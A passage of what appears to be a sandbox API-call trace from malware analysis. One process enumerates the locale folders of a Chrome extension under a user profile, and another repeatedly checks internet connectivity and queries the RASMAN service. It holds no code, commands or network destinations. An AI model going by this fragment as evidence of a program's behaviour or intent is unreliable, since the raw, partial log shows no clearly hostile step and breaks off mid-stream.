FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x000CFi\xe0\x91\xcf\x01\xa0s\xbax\xe0\x91\xcf\x01\xa0s\xbax\xe0\x91\xcf\x01\xa0s\xbax\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00bjmhmf\x00\x00\x00\x00\x00\x00\x00\x00\xf0|\xc9m\xe0\x91\xcf\x01@\x88\x1dn\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01@\x88\x1dn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x006\x00.\x003\x00_\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:14,836 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:14,916 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:14,916 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0|\xc9m\xe0\x91\xcf\x01@\x88\x1dn\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01@\x88\x1dn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 e = 0p\x00\x00\x00\x00\x00\x00\x00\xf0|\xc9m\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01\xe6\x1d\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x002\x008\x00.\x00p\x00n\x00g\x008\x00.\x00x\x00\x00\x00\x00\x00\x00\x00\x00\xbf\xf2m\xe0\x91\xcf\x01\x10\x8e\x03n\xe0\x91\xcf\x01\x10\x8e\x03n\xe0\x91\xcf\x01\x10\x8e\x03n\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:14,916 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,006 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:15,006 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x04\xcbm\xe0\x91\xcf\x01\xd07\xf1m\xe0\x91\xcf\x01\xd07\xf1m\xe0\x91\xcf\x01\xd07\xf1m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ty_Scah\x00\x00\x00\x00\x00\x00\x00 \x04\xcbm\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00r\x00r\x00i\x00f\x00h\x00\x00\x00\x00\x00\x00\x00P\x8b\xccm\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,006 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,086 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\ar\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,086 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x04\xcbm\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x8b\xccm\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01\x16\x01\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,086 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,086 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,166 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\bg\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,166 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x8b\xccm\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01P\x8b\xccm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x8b\xccm\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01?\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,166 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,166 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,196 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:15,196 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:15,196 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:15,196 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:15,196 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:15,246 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\ca\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,246 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x12\xcem\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01\x80\x12\xcem\xe0\x91\xcf\x01\x80\x12\xcem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x12\xcem\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01 \x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,246 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,246 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,326 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\cs\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,326 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x99\xcfm\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01\xb0\x99\xcfm\xe0\x91\xcf\x01\xb0\x99\xcfm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x99\xcfm\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01\x03\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,326 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,326 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,407 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\da\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,407 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0 \xd1m\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01\xe0 \xd1m\xe0\x91\xcf\x01\xe0 \xd1m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0 \xd1m\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01\xf3\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,407 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,407 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,567 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\de\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,577 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xa8\xd2m\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01\x10\xa8\xd2m\xe0\x91\xcf\x01\x10\xa8\xd2m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8\xd2m\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,577 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,577 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,657 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\el\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,657 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xa8\xd2m\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01\x10\xa8\xd2m\xe0\x91\xcf\x01\x10\xa8\xd2m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8\xd2m\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01I\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,657 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,657 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,737 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\en_GB\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,737 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@/\xd4m\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01@/\xd4m\xe0\x91\xcf\x01@/\xd4m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@/\xd4m\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01\xf9\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,737 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,737 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,817 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\en_US\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,817 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xb6\xd5m\xe0\x91\xcf\x01Pq\xfdm\xe0\x91\xcf\x01p\xb6\xd5m\xe0\x91\xcf\x01p\xb6\xd5m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xb6\xd5m\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01p\x9c\x06n\xe0\x91\xcf\x01\xf9\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,817 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,817 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,897 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\es\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,897 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xb6\xd5m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01p\xb6\xd5m\xe0\x91\xcf\x01p\xb6\xd5m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xb6\xd5m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x03\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,897 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,897 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,977 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\es_419\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:15,977 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0=\xd7m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\xa0=\xd7m\xe0\x91\xcf\x01\xa0=\xd7m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0=\xd7m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x03\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:15,977 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:15,977 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:15,997 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:15,997 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:15,997 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016a080 | |
| 07:44:15,997 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016a080 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00182d20 | |
| 07:44:15,997 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:15,997 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:15,997 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:16,058 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\et\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,058 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0=\xd7m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\xa0=\xd7m\xe0\x91\xcf\x01\xa0=\xd7m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0=\xd7m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xfb\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,058 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,058 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
